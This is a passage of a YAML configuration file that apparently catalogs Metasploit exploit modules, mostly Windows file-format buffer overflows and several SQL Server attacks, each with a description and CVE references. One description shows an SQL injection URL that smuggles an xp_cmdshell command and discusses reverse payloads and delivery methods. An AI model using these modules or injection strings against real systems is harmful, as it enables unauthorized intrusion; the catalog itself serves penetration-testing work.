v.2.6.5 Get() method Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThe SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow.\n\ + \t\t\t\tBy passing an overly long argument via the Get method, a remote attacker could\n\ + \t\t\t\toverflow a buffer and execute arbitrary code on the system with the privileges\n\ + \t\t\t\tof the user. This control is not marked safe for scripting, please choose your\n\ + \t\t\t\tattack vector carefully.\n\ + \t\t\t\t" + authors: + - - CVE + - 2008-6898 + - - OSVDB + - "55945" + - - BID + - "33053" + path: extensions/metasploit/ + class: Msf_module +msf_fatplayer_wav: + enable: true + msf: true + msf_key: windows/fileformat/fatplayer_wav + name: Fat Player Media Player 0.6b0 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Fat Player 0.6b. When\n\ + \t\t\t\tthe application is used to import a specially crafted wav file, a buffer overflow occurs\n\ + \t\t\t\tallowing arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "57343" + - - URL + - https://www.exploit-db.com/exploits/15279/ + path: extensions/metasploit/ + class: Msf_module +msf_mjm_coreplayer2011_s3m: + enable: true + msf: true + msf_key: windows/fileformat/mjm_coreplayer2011_s3m + name: MJM Core Player 2011 .s3m Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in MJM Core Player 2011\n\ + \t\t\t\tWhen opening a malicious s3m file in this applications, a stack buffer overflow can be\n\ + \t\t\t\ttriggered, resulting in arbitrary code execution.\n\ + \t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. \n\ + \t\t\t" + authors: + - - OSVDB + - "72101" + - - URL + - http://www.corelan.be/advisories.php?id=CORELAN-11-004 + path: extensions/metasploit/ + class: Msf_module +msf_wm_downloader_m3u: + enable: true + msf: true + msf_key: windows/fileformat/wm_downloader_m3u + name: WM Downloader 3.1.2.2 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n\ + \t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\ + \t\t\t\tallowing arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "66911" + - - URL + - http://www.exploit-db.com/exploits/14497/ + path: extensions/metasploit/ + class: Msf_module +msf_adobe_flashplayer_button: + enable: true + msf: true + msf_key: windows/fileformat/adobe_flashplayer_button + name: Adobe Flash Player "Button" Remote Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the handling of certain SWF movies\n\ + \t\t\t\twithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\n\ + \t\t\t\tare also vulnerable, as are any other applications that may embed Flash player.\n\n\ + \t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\n\ + \t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\n\ + \t\t\t\tthat the memory used by the invalid pointer issue is controlled.\n\n\ + \t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\n\ + \t\t\t\tadobe_libtiff module. This method is unlikely to work across various\n\ + \t\t\t\tWindows versions due a the hardcoded syscall number.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3654 + - - OSVDB + - "68932" + - - BID + - "44504" + - - URL + - http://www.adobe.com/support/security/advisories/apsa10-05.html + - - URL + - http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/ + - - URL + - http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/ + path: extensions/metasploit/ + class: Msf_module +msf_deepburner_path: + enable: true + msf: true + msf_key: windows/fileformat/deepburner_path + name: AstonSoft DeepBurner (DBR File) Path Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in versions 1.9.0.228,\n\ + \t\t\t\t1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n\ + \t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\ + \t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\ + \t\t\t\tDBR file within a browser, since the DBR extention is registered to DeepBurner.\n\ + \t\t\t" + authors: + - - BID + - "21657" + - - OSVDB + - "32356" + - - CVE + - 2006-6665 + - - URL + - http://milw0rm.com/exploits/2950 + - - URL + - http://milw0rm.com/exploits/8335 + - - URL + - http://www.exploit-db.com/exploits/11315 + path: extensions/metasploit/ + class: Msf_module +msf_acdsee_xpm: + enable: true + msf: true + msf_key: windows/fileformat/acdsee_xpm + name: ACDSee XPM File Section Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in ACDSee 9.0.\n\ + \t\t\t\tWhen viewing a malicious XPM file with the ACDSee product,\n\ + \t\t\t\ta remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2193 + - - OSVDB + - "35236" + - - BID + - "23620" + path: extensions/metasploit/ + class: Msf_module +msf_bacnet_csv: + enable: true + msf: true + msf_key: windows/fileformat/bacnet_csv + name: BACnet OPC Client Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SCADA\n\ + \t\t\t\tEngine BACnet OPC Client v1.0.24. When the BACnet OPC Client\n\ + \t\t\t\tparses a specially crafted csv file, arbitrary code may be\n\ + \t\t\t\texecuted.\n\ + \t\t\t" + authors: + - - OSVDB + - "68096" + - - BID + - "43289" + - - URL + - http://www.us-cert.gov/control_systems/pdf/ICSA-10-264-01.pdf + path: extensions/metasploit/ + class: Msf_module +msf_cain_abel_4918_rdp: + enable: true + msf: true + msf_key: windows/fileformat/cain_abel_4918_rdp + name: Cain & Abel <= v4.9.24 RDP Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24\n\ + \t\t\t\tand below. An attacker must send the file to victim, and the victim must open\n\ + \t\t\t\tthe specially crafted RDP file under Tools -> Remote Desktop Password Decoder.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5405 + - - OSVDB + - "50342" + - - URL + - http://www.milw0rm.com/exploits/7329 + - - BID + - "32543" + path: extensions/metasploit/ + class: Msf_module +msf_subtitle_processor_m3u_bof: + enable: true + msf: true + msf_key: windows/fileformat/subtitle_processor_m3u_bof + name: Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found in Subtitle Processor 7. By\n\ + \t\t\t\tsupplying a long string of data as a .m3u file, Subtitle Processor first converts\n\ + \t\t\t\tthis input in Unicode, which expands the string size, and then attempts to copy it\n\ + \t\t\t\tinline on the stack. This results a buffer overflow with SEH overwritten, allowing\n\ + \t\t\t\tarbitrary code execution.\n\ + \t\t\t" + authors: + - - URL + - http://sourceforge.net/projects/subtitleproc/ + - - URL + - http://www.exploit-db.com/exploits/17217/ + path: extensions/metasploit/ + class: Msf_module +msf_mymp3player_m3u: + enable: true + msf: true + msf_key: windows/fileformat/mymp3player_m3u + name: Steinberg MyMP3Player 3.0 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n\ + \t\t\t\tthe application is used to open a specially crafted m3u file, a buffer overflow occurs\n\ + \t\t\t\tallowing arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "64580" + - - URL + - http://www.exploit-db.com/exploits/11791 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_collectemailinfo: + enable: true + msf: true + msf_key: windows/fileformat/adobe_collectemailinfo + name: Adobe Collab.collectEmailInfo() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n\ + \t\t\t\t\tBy creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call,\n\ + \t\t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5659 + - - OSVDB + - "41495" + path: extensions/metasploit/ + class: Msf_module +msf_ideal_migration_ipj: + enable: true + msf: true + msf_key: windows/fileformat/ideal_migration_ipj + name: PointDev IDEAL Migration Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in versions v9.7\n\ + \t\t\t\tthrough v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n\ + \t\t\t\tIDEAL Migration. All versions are suspected to be vulnerable.\n\ + \t\t\t\tBy creating a specially crafted ipj file, an an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\n\ + \t\t\t\tNOTE: IDEAL Administration 10.5 is compiled with /SafeSEH\n\ + \t\t\t" + authors: + - - CVE + - 2009-4265 + - - OSVDB + - "60681" + - - URL + - http://www.exploit-db.com/exploits/10319 + - - URL + - http://www.exploit-db.com/exploits/12403 + - - URL + - http://www.exploit-db.com/exploits/12404 + - - URL + - http://www.exploit-db.com/exploits/12540 + path: extensions/metasploit/ + class: Msf_module +msf_djvu_imageurl: + enable: true + msf: true + msf_key: windows/fileformat/djvu_imageurl + name: DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an\n\ + \t\t\t\toverly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n\ + \t\t\t\tan attacker may be able to execute arbitrary code. This control is not marked safe\n\ + \t\t\t\tfor scripting, so choose your attack vector accordingly.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4922 + - - OSVDB + - "49592" + - - BID + - "31987" + path: extensions/metasploit/ + class: Msf_module +msf_ht_mp3player_ht3_bof: + enable: true + msf: true + msf_key: windows/fileformat/ht_mp3player_ht3_bof + name: HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HT-MP3Player 1.0.\n\ + \t\t\t\t\tArbitrary code execution could occur when parsing a specially crafted\n\ + \t\t\t\t\t.HT3 file.\n\n\ + \t\t\t\t\tNOTE: The player installation does not register the file type to be\n\ + \t\t\t\t\thandled. Therefore, a user must take extra steps to load this file.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2485 + - - OSVDB + - "55449" + - - URL + - http://www.milw0rm.com/exploits/9034 + - - URL + - http://www.milw0rm.com/exploits/9038 + path: extensions/metasploit/ + class: Msf_module +msf_vlc_webm: + enable: true + msf: true + msf_key: windows/fileformat/vlc_webm + name: VideoLAN VLC MKV Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an input validation error in VideoLAN VLC\n\ + \t\t\t\t< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n\ + \t\t\t\tcould execute arbitrary code.\n\n\ + \t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n\ + \t\t\t\tpermanently enable NX support on machines that support it.\n\ + \t\t\t" + authors: + - - OSVDB + - "70698" + - - CVE + - 2011-0531 + - - BID + - "46060" + - - URL + - http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456 + - - URL + - http://www.videolan.org/security/sa1102.html + path: extensions/metasploit/ + class: Msf_module +msf_altap_salamander_pdb: + enable: true + msf: true + msf_key: windows/fileformat/altap_salamander_pdb + name: Altap Salamander 2.5 PE Viewer Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Altap Salamander <= v2.5.\n\ + \t\t\t\t\tBy creating a malicious file and convincing a user to view the file with\n\ + \t\t\t\t\tthe Portable Executable Viewer plugin within a vulnerable version of\n\ + \t\t\t\t\tSalamander, the PDB file string is copied onto the stack and the\n\ + \t\t\t\t\tSEH can be overwritten.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3314 + - - BID + - "24557" + - - OSVDB + - "37579" + - - URL + - http://vuln.sg/salamander25-en.html + path: extensions/metasploit/ + class: Msf_module +msf_adobe_illustrator_v14_eps: + enable: true + msf: true + msf_key: windows/fileformat/adobe_illustrator_v14_eps + name: Adobe Illustrator CS4 v14.0.0 + category: Metasploit + description: "\n\ + \t\t\t\t\tAdobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n\ + \t\t\t\toverlong DSC Comment Buffer Overflow Exploit\n\ + \t\t\t" + authors: + - - CVE + - 2009-4195 + - - BID + - "37192" + - - OSVDB + - "60632" + - - URL + - http://retrogod.altervista.org/9sg_adobe_illuso.html + - - URL + - http://www.exploit-db.com/exploits/10281 + path: extensions/metasploit/ + class: Msf_module +msf_ezip_wizard_bof: + enable: true + msf: true + msf_key: windows/fileformat/ezip_wizard_bof + name: eZip Wizard 3.0 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in\n\ + \t\t\t\tversion 3.0 of ediSys Corp.'s eZip Wizard.\n\n\ + \t\t\t\tIn order for the command to be executed, an attacker must convince someone to\n\ + \t\t\t\topen a specially crafted zip file with eZip Wizard, and access the specially\n\ + \t\t\t\tfile via double-clicking it. By doing so, an attacker can execute arbitrary\n\ + \t\t\t\tcode as the victim user.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1028 + - - OSVDB + - "52815" + - - BID + - "34044" + - - URL + - http://www.edisys.com/ + - - URL + - http://www.exploit-db.com/exploits/8180 + - - URL + - http://www.exploit-db.com/exploits/12059/ + path: extensions/metasploit/ + class: Msf_module +msf_aol_phobos_bof: + enable: true + msf: true + msf_key: windows/fileformat/aol_phobos_bof + name: AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n\ + \t\t\t\tBy setting an overly long value to 'Import()', an attacker can overrun a buffer\n\ + \t\t\t\tand execute arbitrary code.\n\n\ + \t\t\t\tNOTE: This ActiveX control is NOT marked safe for scripting or initialization.\n\ + \t\t\t" + authors: + - - OSVDB + - "61964" + - - URL + - http://www.exploit-db.com/exploits/11204 + - - URL + - http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/ + path: extensions/metasploit/ + class: Msf_module +msf_videospirit_visprj: + enable: true + msf: true + msf_key: windows/fileformat/videospirit_visprj + name: VeryTools Video Spirit Pro <= 1.70 + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Video Spirit <= 1.70.\n\ + \t\t\t\tWhen opening a malicious project file (.visprj), a stack buffer overflow occurs,\n\ + \t\t\t\tresulting in arbitrary code execution.\n\ + \t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.\n\ + \t\t\t" + authors: + - - CVE + - 2011-0499 + - - CVE + - 2011-0500 + - - OSVDB + - "70619" + - - URL + - http://www.corelan.be/advisories.php?id=CORELAN-11-001 + path: extensions/metasploit/ + class: Msf_module +msf_destinymediaplayer16: + enable: true + msf: true + msf_key: windows/fileformat/destinymediaplayer16 + name: Destiny Media Player 1.61 PLS M3U Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n\ + \t\t\t\t\tAn attacker must send the file to victim and the victim must open the file. File-->Open Playlist\n\ + \t\t\t" + authors: + - - CVE + - 2009-3429 + - - OSVDB + - "53249" + - - URL + - http://www.milw0rm.com/exploits/7651 + - - BID + - "33091" + path: extensions/metasploit/ + class: Msf_module +msf_xenorate_xpl_bof: + enable: true + msf: true + msf_key: windows/fileformat/xenorate_xpl_bof + name: Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Xenorate 2.50\n\ + \t\t\t\tBy creating a specially crafted xpl file, an an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "57162" + - - URL + - http://www.exploit-db.com/exploits/10371 + path: extensions/metasploit/ + class: Msf_module +msf_ursoft_w32dasm: + enable: true + msf: true + msf_key: windows/fileformat/ursoft_w32dasm + name: URSoft W32Dasm Disassembler Function Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in W32Dasm <= v8.93.\n\ + \t\t\t\tBy creating a malicious file and convincing a user to disassemble\n\ + \t\t\t\tthe file with a vulnerable version of W32Dasm, the Imports/Exports\n\ + \t\t\t\tfunction is copied to the stack and arbitrary code may be executed\n\ + \t\t\t\tlocally as the user.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0308 + - - OSVDB + - "13169" + - - BID + - "12352" + - - URL + - http://aluigi.altervista.org/adv/w32dasmbof-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_ultraiso_ccd: + enable: true + msf: true + msf_key: windows/fileformat/ultraiso_ccd + name: UltraISO CCD File Parsing Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\n\ + \t\t\t\tUltraISO. When processing .CCD files, data is read from file into a\n\ + \t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n\ + \t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\n\ + \t\t\t\tto open an CCD file.\n\n\ + \t\t\t\tNOTE: A file with the same base name, but the extension of \"img\" must also\n\ + \t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\n\ + \t\t\t\tboth exist.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1260 + - - OSVDB + - "53275" + - - BID + - "34363" + - - BID + - "38613" + - - URL + - http://www.exploit-db.com/exploits/8343 + path: extensions/metasploit/ + class: Msf_module +msf_zinfaudioplayer221_pls: + enable: true + msf: true + msf_key: windows/fileformat/zinfaudioplayer221_pls + name: Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n\ + \t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\ + \t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\ + \t\t\t\tPLS file within a browser, when the PLS extention is registered to Zinf.\n\ + \t\t\t\tThis functionality has not been tested in this module.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0964 + - - OSVDB + - "10416" + - - URL + - http://www.milw0rm.com/exploits/7888 + - - BID + - "11248" + path: extensions/metasploit/ + class: Msf_module +msf_digital_music_pad_pls: + enable: true + msf: true + msf_key: windows/fileformat/digital_music_pad_pls + name: Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n\ + \t\t\t\tWhen opening a malicious pls file with the Digital Music Pad,\n\ + \t\t\t\ta remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "68178" + - - URL + - http://secunia.com/advisories/41519/ + - - URL + - http://www.exploit-db.com/exploits/15134 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_u3d_meshdecl: + enable: true + msf: true + msf_key: windows/fileformat/adobe_u3d_meshdecl + name: Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n\ + \t\t\t\t\tAffected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n\ + \t\t\t\t\tspecially crafted pdf that a contains malformed U3D data, an attacker may\n\ + \t\t\t\t\tbe able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3953 + - - OSVDB + - "61690" + - - URL + - http://www.adobe.com/support/security/bulletins/apsb10-02.html + path: extensions/metasploit/ + class: Msf_module +msf_magix_musikmaker_16_mmm: + enable: true + msf: true + msf_key: windows/fileformat/magix_musikmaker_16_mmm + name: Magix Musik Maker 16 .mmm Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Magix Musik Maker 16.\n\ + \t\t\t\tWhen opening a specially crafted arrangement file (.mmm) in the application, an\n\ + \t\t\t\tunsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n\ + \t\t\t\tbypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n\ + \t\t\t\tmight require up to several seconds to receive a shell.\n\ + \t\t\t" + authors: + - - OSVDB + - "72455" + - - URL + - http://www.corelan.be/advisories.php?id=CORELAN-11-002 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_pdf_embedded_exe_nojs: + enable: true + msf: true + msf_key: windows/fileformat/adobe_pdf_embedded_exe_nojs + name: Adobe PDF Escape EXE Social Engineering (No JavaScript) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module embeds a Metasploit payload into an existing PDF file in\n\ + \t\t\t\ta non-standard method. The resulting PDF can be sent to a target as\n\ + \t\t\t\tpart of a social engineering attack.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1240 + - - OSVDB + - "63667" + - - URL + - http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/ + - - URL + - http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/ + - - URL + - http://blog.didierstevens.com/2010/03/29/escape-from-pdf/ + path: extensions/metasploit/ + class: Msf_module +msf_ms_visual_basic_vbp: + enable: true + msf: true + msf_key: windows/fileformat/ms_visual_basic_vbp + name: Microsoft Visual Basic VBP Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack oveflow in Microsoft Visual\n\ + \t\t\t\tBasic 6.0. When a specially crafted vbp file containing a long\n\ + \t\t\t\treference line, an attacker may be able to execute arbitrary\n\ + \t\t\t\tcode.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4776 + - - OSVDB + - "36936" + - - BID + - "25629" + path: extensions/metasploit/ + class: Msf_module +msf_somplplayer_m3u: + enable: true + msf: true + msf_key: windows/fileformat/somplplayer_m3u + name: S.O.M.P.L 1.0 Player Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Simple Open Music Player v1.0. When\n\ + \t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\ + \t\t\t\tallowing arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "64368" + - - URL + - http://www.exploit-db.com/exploits/11219 + path: extensions/metasploit/ + class: Msf_module +msf_foxit_title_bof: + enable: true + msf: true + msf_key: windows/fileformat/foxit_title_bof + name: Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n\ + \t\t\t\t4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n\ + \t\t\t\tcontains an overly long string in the Title field. This results in overwriting a\n\ + \t\t\t\tstructured exception handler record.\n\n\ + \t\t\t\tNOTE: This exploit does not use javascript.\n\ + \t\t\t" + authors: + - - OSVDB + - "68648" + - - URL + - http://www.exploit-db.com/exploits/15532 + - - URL + - http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/ + path: extensions/metasploit/ + class: Msf_module +msf_varicad_dwb: + enable: true + msf: true + msf_key: windows/fileformat/varicad_dwb + name: VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n\ + \t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\ + \t\t\t" + authors: + - - OSVDB + - "63067" + - - BID + - "38815" + - - URL + - http://www.exploit-db.com/exploits/11789 + path: extensions/metasploit/ + class: Msf_module +msf_ms09_004_sp_replwritetovarbin_sqli: + enable: true + msf: true + msf_key: windows/mssql/ms09_004_sp_replwritetovarbin_sqli + name: Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection + category: Metasploit + description: "\n\ + \t\t\t\t\tA heap-based buffer overflow can occur when calling the undocumented\n\ + \t\t\t\t\"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n\ + \t\t\t\tall versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n\ + \t\t\t\tand Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n\ + \t\t\t\tMicrosoft patched this vulnerability in SP3 for 2005 without any public\n\ + \t\t\t\tmention.\n\n\ + \t\t\t\tThis exploit smashes several pointers, as shown below.\n\n\ + \t\t\t\t1. pointer to a 32-bit value that is set to 0\n\ + \t\t\t\t2. pointer to a 32-bit value that is set to a length influcenced by the buffer\n\ + \t\t\t\t\tlength.\n\ + \t\t\t\t3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n\ + \t\t\t\t\tthis value is referenced with a displacement of 0x38. For MSSQL 2005, the\n\ + \t\t\t\t\tdisplacement is 0x10. The address of our buffer is conveniently stored in\n\ + \t\t\t\t\tecx when this instruction is executed.\n\ + \t\t\t\t4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n\ + \t\t\t\t\ta displacement of 4. This pointer is not used by this exploit.\n\n\ + \t\t\t\tThis particular exploit replaces the previous dual-method exploit. It uses\n\ + \t\t\t\ta technique where the value contained in ecx becomes the stack. From there,\n\ + \t\t\t\treturn oriented programming is used to normalize the execution state and\n\ + \t\t\t\tfinally execute the payload via a \"jmp esp\". All addresses used were found\n\ + \t\t\t\twithin the sqlservr.exe memory space, yielding very reliable code execution\n\ + \t\t\t\tusing only a single query.\n\n\ + \t\t\t\tNOTE: The MSSQL server service does not automatically restart by default. That\n\ + \t\t\t\tsaid, some exceptions are caught and will not result in terminating the process.\n\ + \t\t\t\tIf the exploit crashes the service prior to hijacking the stack, it won't die.\n\ + \t\t\t\tOtherwise, it's a goner.\n\ + \t\t\t" + authors: + - - OSVDB + - "50589" + - - CVE + - 2008-5416 + - - BID + - "32710" + - - MSB + - MS09-004 + - - URL + - http://www.milw0rm.com/exploits/7501 + - - URL + - http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/ + path: extensions/metasploit/ + class: Msf_module +msf_lyris_listmanager_weak_pass: + enable: true + msf: true + msf_key: windows/mssql/lyris_listmanager_weak_pass + name: Lyris ListManager MSDE Weak sa Password + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a weak password vulnerability in the\n\ + \t\t\t\tLyris ListManager MSDE install. During installation, the 'sa'\n\ + \t\t\t\taccount password is set to 'lminstall'. Once the install\n\ + \t\t\t\tcompletes, it is set to 'lyris' followed by the process\n\ + \t\t\t\tID of the installer. This module brute forces all possible\n\ + \t\t\t\tprocess IDs that would be used by the installer.\n\ + \t\t\t" + authors: + - - CVE + - 2005-4145 + - - OSVDB + - "21559" + path: extensions/metasploit/ + class: Msf_module +msf_ms02_056_hello: + enable: true + msf: true + msf_key: windows/mssql/ms02_056_hello + name: Microsoft SQL Server Hello Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tBy sending malformed data to TCP port 1433, an\n\ + \t\t\t\tunauthenticated remote attacker could overflow a buffer and\n\ + \t\t\t\tpossibly execute code on the server with SYSTEM level\n\ + \t\t\t\tprivileges. This module should work against any vulnerable\n\ + \t\t\t\tSQL Server 2000 or MSDE install (< SP3).\n\n\ + \t\t\t" + authors: + - - CVE + - 2002-1123 + - - OSVDB + - "10132" + - - BID + - "5411" + - - MSB + - MS02-056 + path: extensions/metasploit/ + class: Msf_module +msf_mssql_payload_sqli: + enable: true + msf: true + msf_key: windows/mssql/mssql_payload_sqli + name: Microsoft SQL Server Payload Execution via SQL injection + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module will execute an arbitrary payload on a Microsoft SQL\n\ + \t\t\t\tServer, using a SQL injection vulnerability.\n\n\ + \t\t\t\tOnce a vulnerability is identified this module\n\ + \t\t\t\twill use xp_cmdshell to upload and execute Metasploit payloads.\n\ + \t\t\t\tIt is necessary to specify the exact point where the SQL injection\n\ + \t\t\t\tvulnerability happens. For example, given the following injection:\n\n\ + \t\t\t\thttp://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n\ + \t\t\t\tyou would need to set the following path:\n\ + \t\t\t\tset GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n\ + \t\t\t\tIn regard to the payload, unless there is a closed port in the web server,\n\ + \t\t\t\tyou dont want to use any \"bind\" payload, specially on port 80, as you will\n\ + \t\t\t\tstop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n\ + \t\t\t\tyour port 80 or to any other outbound port allowed on the firewall.\n\ + \t\t\t\tFor privileged ports execute Metasploit msfconsole as root.\n\n\ + \t\t\t\tCurrently, three delivery methods are supported.\n\n\ + \t\t\t\tFirst, the original method uses Windows 'debug.com'. File size restrictions are\n\ + \t\t\t\tavoidied by incorporating the debug bypass method presented by SecureStat at\n\ + \t\t\t\tDefcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.\n\n\ + \t\t\t\tA second method takes advantage of the Command Stager subsystem. This allows using\n\ + \t\t\t\tvarious techniques, such as using a TFTP server, to send the executable. By default\n\ + \t\t\t\tthe Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n\ + \t\t\t\tFinally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n\ + \t\t\t\tpayload on the target.\n\n\ + \t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\ 